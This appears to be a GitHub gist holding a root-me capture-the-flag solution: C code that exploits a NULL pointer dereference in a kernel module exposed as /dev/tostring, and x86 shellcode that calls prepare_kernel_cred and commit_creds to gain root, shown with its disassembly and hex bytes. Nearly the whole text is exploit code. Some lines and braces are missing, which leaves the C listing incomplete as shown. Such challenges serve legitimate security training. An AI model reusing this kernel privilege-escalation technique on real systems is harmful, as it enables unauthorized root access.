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Last active January 2, 2018 15:29
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  • Save HopHouse/506a4ae05b189e307e7f9e9a77e33cf6 to your computer and use it in GitHub Desktop.
Save HopHouse/506a4ae05b189e307e7f9e9a77e33cf6 to your computer and use it in GitHub Desktop.
CH2 root-me
* Rouvès Quentin -
* Exploit NULL Dereference kernel module
* Exec: gcc exploit.c -static -m32 -o exploit
#include <sys/types.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <string.h>
char payload[] = "\x31\xc0\xe8\xe9\x11\x07\xc1\xe8\x74\x0e\x07\xc1\xc3";
void get_shell() {
char *argv[] = {"/bin/sh", NULL};
if (getuid() == 0){
printf("[+] Root shell success !\n");
//execve("/bin/sh", argv, NULL);
else {
printf("[-] failed to get root shell\n");
int main () {
printf("[+] Script: Try to allocat 0x00000000...\n");
printf("[-] Script: Failed to allocat at 0x00000000\n");
return -1;
printf("[+] Script: Allocation success !\n");
printf("[+] Script: Try to put payload at 0x00000000...\n");
if (memcpy (NULL , payload , sizeof ( payload )) == (char *)-1){
printf("[-] Script: Failed to put payload at 0x00000000\n");
return -1;
printf("[+] Script: Put payload success !\n");
printf("[+] Script: Open the file for reading and writing\n");
int fd = open ( "/dev/tostring" , O_RDWR );
printf("[+] Script: Write command to delete the stack\n");
write ( fd , "**********S\n" , 12);
char tmp[1];
printf("[+] Script: Read the file\n");
read(fd, tmp, 1);
printf("[+] Script: Close the file\n");
* Rouvès Quentin -
* Exploit NULL Dereference kernel module
* Exec: gcc payload.S -o payload -nostdlib -m32 -Ttext=0
// prepare kernel cred c10711f0
// commit cred: c1070e80
.globl _start
xor %eax , %eax # Put eax to 0
call 0xc10711f0 # Call prepare kernel cred with arg 0
call 0xc1070e80 # Call commit creds
payload: file format elf32-i386
Disassembly of section .text:
00000000 <_start>:
0: 31 c0 xor %eax,%eax
2: e8 e9 11 07 c1 call c10711f0 <_end+0xc10701e0>
7: e8 74 0e 07 c1 call c1070e80 <_end+0xc106fe70>
c: c3 ret
payload = \x31\xc0\xe8\xe9\x11\x07\xc1\xe8\x74\x0e\x07\xc1\xc3
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